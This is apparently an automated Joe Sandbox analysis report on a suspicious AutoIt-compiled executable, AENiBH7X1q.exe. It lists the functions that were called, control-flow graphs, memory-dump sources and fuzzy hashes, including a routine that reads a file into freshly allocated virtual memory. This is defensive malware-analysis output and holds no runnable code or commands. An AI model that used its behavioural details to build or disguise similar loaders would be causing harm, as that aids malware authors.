                                                                                                                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetSysColorBrush.USER32 ref: 00410326
                                                                                                                                                                                                                                                                                                                                                                                                                • RegisterClassExW.USER32 ref: 00410359
                                                                                                                                                                                                                                                                                                                                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                                                                                                                                                                                                                                                                                                                                                                • InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                                                                                                                                                                                                                                                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                                                                                                                                                                                                                                                                                                                                                                                                                • ImageList_ReplaceIcon.COMCTL32(00A7F4B8,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2914291525-1005189915
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c8c51aded5b6d43d10953d3ded2c15c159303f3bf9a059b11759766ceadcbce4
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9F2129B4518301AFD340DF64D888B4EBFF4FB89704F008A2EF685962A0E7B58144CF5A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004101F0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 74windowregistryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 004101F9
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00410209
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadIconW.USER32(?,00000063), ref: 0041021F
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadIconW.USER32(?,000000A4), ref: 00410232
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadIconW.USER32(?,000000A2), ref: 00410245
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
                                                                                                                                                                                                                                                                                                                                                                                                                • RegisterClassExW.USER32 ref: 004102C6
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004102F0: GetSysColorBrush.USER32 ref: 00410326
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004102F0: RegisterClassExW.USER32 ref: 00410359
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004102F0: RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004102F0: InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004102F0: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004102F0: LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004102F0: ImageList_ReplaceIcon.COMCTL32(00A7F4B8,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: #$0$PGH
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 423443420-3673556320
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 6be78a7d21e01e6533eb66d2751721d4fd39e3055bf34e10baa21603515e7cea
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60216DB5A18300AFD310CF59EC84A4A7FE4FB99710F00497FF648972A0D7B599408B99
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00452574 Relevance: 13.7, APIs: 9, Instructions: 171COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • _fseek.LIBCMT ref: 004525DA
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452618
                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452629
                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452644
                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452661
                                                                                                                                                                                                                                                                                                                                                                                                                • _fseek.LIBCMT ref: 0045267D
                                                                                                                                                                                                                                                                                                                                                                                                                • _malloc.LIBCMT ref: 00452689
                                                                                                                                                                                                                                                                                                                                                                                                                • _malloc.LIBCMT ref: 00452696
                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 004526A7
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __fread_nolock$_fseek_malloc_wcscpy
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1911931848-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: daf5751c9f96f1f9c2235ce4d63c31b1673d17b5fb5ed0b9a51dc370059b243a
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 47514CB1A08340AFD310DF5AD881A9BF7E9FFC8704F40492EF68887241D77AE5448B5A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0040F450 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 126COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                control_flow_graph 1344 40f450-40f45c call 425210 1347 40f460-40f478 1344->1347 1347->1347 1348 40f47a-40f4a8 call 413990 call 410f70 1347->1348 1353 40f4b0-40f4d1 call 4151b0 1348->1353 1356 40f531 1353->1356 1357 40f4d3-40f4da 1353->1357 1360 40f536-40f540 1356->1360 1358 40f4dc-40f4de 1357->1358 1359 40f4fd-40f517 call 41557c 1357->1359 1361 40f4e0-40f4e2 1358->1361 1364 40f51c-40f51f 1359->1364 1363 40f4e6-40f4ed 1361->1363 1365 40f521-40f52c 1363->1365 1366 40f4ef-40f4f2 1363->1366 1364->1353 1369 40f543-40f54e 1365->1369 1370 40f52e-40f52f 1365->1370 1367 42937a-4293a0 call 41557c call 4151b0 1366->1367 1368 40f4f8-40f4fb 1366->1368 1381 4293a5-4293c3 call 4151d0 1367->1381 1368->1359 1368->1361 1372 40f550-40f553 1369->1372 1373 40f555-40f560 1369->1373 1370->1366 1372->1366 1374 429372 1373->1374 1375 40f566-40f571 1373->1375 1374->1367 1377 429361-429367 1375->1377 1378 40f577-40f57a 1375->1378 1377->1363 1380 42936d 1377->1380 1378->1366 1380->1374 1381->1360
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __fread_nolock_fseek_strcat
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: AU3!$EA06
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3818483258-2658333250
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: a326fe91d6bb541f17a8cee8b09d92be642ba4032c5aa5fe266a96c6f27d1a6c
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B416C7160C340ABC331DA24C841AEB77A59B95308F68087EF5C597683E578E44A876B
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00410130 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 76COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                control_flow_graph 1384 410130-410142 SHGetMalloc 1385 410148-410158 SHGetDesktopFolder 1384->1385 1386 42944f-429459 call 411691 1384->1386 1387 4101d1-4101e0 1385->1387 1388 41015a-410188 call 411691 1385->1388 1387->1386 1394 4101e6-4101ee 1387->1394 1396 4101c5-4101ce 1388->1396 1397 41018a-4101a1 SHGetPathFromIDListW 1388->1397 1396->1387 1398 4101a3-4101b1 call 411691 1397->1398 1399 4101b4-4101c0 1397->1399 1398->1399 1399->1396
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _wcscpy$DesktopFolderFromListMallocPath
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\Desktop\AENiBH7X1q.exe
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 192938534-2362206303
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 2fe23ff91bf644c1e681f842d3c1e96d6f0f177144f23c1ad52f1bdc7517ad48
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 822179B5604211AFC210EB64DC84DABB3ECEFC8704F14891DF94987210E739ED46CBA6
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00401230 Relevance: 12.1, APIs: 8, Instructions: 83windowtimeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                control_flow_graph 1402 401230-40123b 1403 401241-401272 call 4131f0 call 401be0 1402->1403 1404 4012c5-4012cd 1402->1404 1409 401274-401292 1403->1409 1410 4012ae-4012bf KillTimer SetTimer 1403->1410 1411 42aa61-42aa67 1409->1411 1412 401298-40129c 1409->1412 1410->1404 1413 42aa8b-42aaa7 Shell_NotifyIconW 1411->1413 1414 42aa69-42aa86 Shell_NotifyIconW 1411->1414 1415 4012a2-4012a8 1412->1415 1416 42aaac-42aab3 1412->1416 1413->1410 1414->1410 1415->1410 1419 42aaf8-42ab15 Shell_NotifyIconW 1415->1419 1417 42aad7-42aaf3 Shell_NotifyIconW 1416->1417 1418 42aab5-42aad2 Shell_NotifyIconW 1416->1418 1417->1410 1418->1410 1419->1410
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • _memset.LIBCMT ref: 00401257
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401BE0: _memset.LIBCMT ref: 00401C62
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401BE0: _wcsncpy.LIBCMT ref: 00401CA1
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401BE0: _wcscpy.LIBCMT ref: 00401CBD
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401BE0: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                                                                                                                                                                                                                                                                                                                                                                                                • KillTimer.USER32(?,?), ref: 004012B0
                                                                                                                                                                                                                                                                                                                                                                                                                • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012BF
                                                                                                                                                                                                                                                                                                                                                                                                                • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AA80
                                                                                                                                                                                                                                                                                                                                                                                                                • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AACC
                                                                                                                                                                                                                                                                                                                                                                                                                • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AB0F
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: IconNotifyShell_$Timer_memset$Kill_wcscpy_wcsncpy
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1792922140-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: a7115ab057bf29602ed6c82bb799c717f5f73d3545905a596edaeb05fb95c8cc
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 78dbdb20408675f5dda5a176dd8a03fc230073daf987e80dd157250a536ae6f7
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a7115ab057bf29602ed6c82bb799c717f5f73d3545905a596edaeb05fb95c8cc
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56319670609642BFD319CB24D544B9BFBE8BF85304F04856EF488A3251C7789A19D7AB
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0538E610 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                control_flow_graph 1420 538e610-538e6be call 538c010 1423 538e6c5-538e6eb call 538f520 CreateFileW 1420->1423 1426 538e6ed 1423->1426 1427 538e6f2-538e702 1423->1427 1428 538e83d-538e841 1426->1428 1435 538e709-538e723 VirtualAlloc 1427->1435 1436 538e704 1427->1436 1429 538e883-538e886 1428->1429 1430 538e843-538e847 1428->1430 1432 538e889-538e890 1429->1432 1433 538e849-538e84c 1430->1433 1434 538e853-538e857 1430->1434 1439 538e892-538e89d 1432->1439 1440 538e8e5-538e8fa 1432->1440 1433->1434 1441 538e859-538e863 1434->1441 1442 538e867-538e86b 1434->1442 1437 538e72a-538e741 ReadFile 1435->1437 1438 538e725 1435->1438 1436->1428 1443 538e748-538e788 VirtualAlloc 1437->1443 1444 538e743 1437->1444 1438->1428 1445 538e89f 1439->1445 1446 538e8a1-538e8ad 1439->1446 1447 538e90a-538e912 1440->1447 1448 538e8fc-538e907 VirtualFree 1440->1448 1441->1442 1449 538e87b 1442->1449 1450 538e86d-538e877 1442->1450 1451 538e78a 1443->1451 1452 538e78f-538e7aa call 538f770 1443->1452 1444->1428 1445->1440 1453 538e8af-538e8bf 1446->1453 1454 538e8c1-538e8cd 1446->1454 1448->1447 1449->1429 1450->1449 1451->1428 1460 538e7b5-538e7bf 1452->1460 1456 538e8e3 1453->1456 1457 538e8da-538e8e0 1454->1457 1458 538e8cf-538e8d8 1454->1458 1456->1432 1457->1456 1458->1456 1461 538e7c1-538e7f0 call 538f770 1460->1461 1462 538e7f2-538e806 call 538f580 1460->1462 1461->1460 1467 538e808 1462->1467 1468 538e80a-538e80e 1462->1468 1467->1428 1470 538e81a-538e81e 1468->1470 1471 538e810-538e814 CloseHandle 1468->1471 1472 538e82e-538e837 1470->1472 1473 538e820-538e82b VirtualFree 1470->1473 1471->1470 1472->1423 1472->1428 1473->1472
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 0538E6E1
                                                                                                                                                                                                                                                                                                                                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0538E907
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2105923084.000000000538C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0538C000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_538c000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CreateFileFreeVirtual
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 204039940-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 1e83fcdd420b4eafba2d626591fa1a0e1cd0f0cf45180d71e83ff4932ccbf2f0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59A10874E00209EBDB18DFA4C894BBEB7BABF48704F208159E515BB280D7759A41DF54
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00414F10 Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                • Not Executed
